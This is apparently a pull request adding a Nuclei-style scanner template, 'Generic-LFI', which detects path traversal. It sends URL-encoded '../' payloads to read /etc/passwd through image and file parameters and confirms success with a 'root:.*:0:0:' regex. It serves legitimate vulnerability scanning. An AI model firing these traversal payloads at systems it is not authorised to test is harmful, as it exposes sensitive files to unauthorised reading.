### PR TITLE
Generic lfi

### DIFF
--- a/exposures/files/generic-lfi.yaml
+++ b/exposures/files/generic-lfi.yaml
@@ -15,6 +15,10 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/image?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/file?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+      - "{{BaseURL}}/file?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
     matchers-condition: and
     matchers:
       - type: status

--- a/exposures/files/generic-lfi.yaml
+++ b/exposures/files/generic-lfi.yaml
@@ -1,0 +1,26 @@
+id: Generic-LFI
+
+info:
+  name: Generic Path Traversal
+  author: 0xSmiley
+  severity: high
+  description: The application exposes critically sensitive information to a user in an insecure manner.
+  tags: lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cwe-id: CWE-22
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body


### PR DESCRIPTION
### Template / PR Information

The application or system does not appropriately secure data at rest or in transport. Sensitive data may also be exposed through side-channels and third-parties. This may allow attackers to access business sensitive information that is not intended to be broadly accessed.

- References:
* https://portswigger.net/web-security/file-path-traversal

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO


#### Additional Details

This template was validated against the following PortSwigger lab: https://portswigger.net/web-security/file-path-traversal/lab-simple. The regular expression will attempt to match "root:.*:0:0:" from the /etc/passwd file.

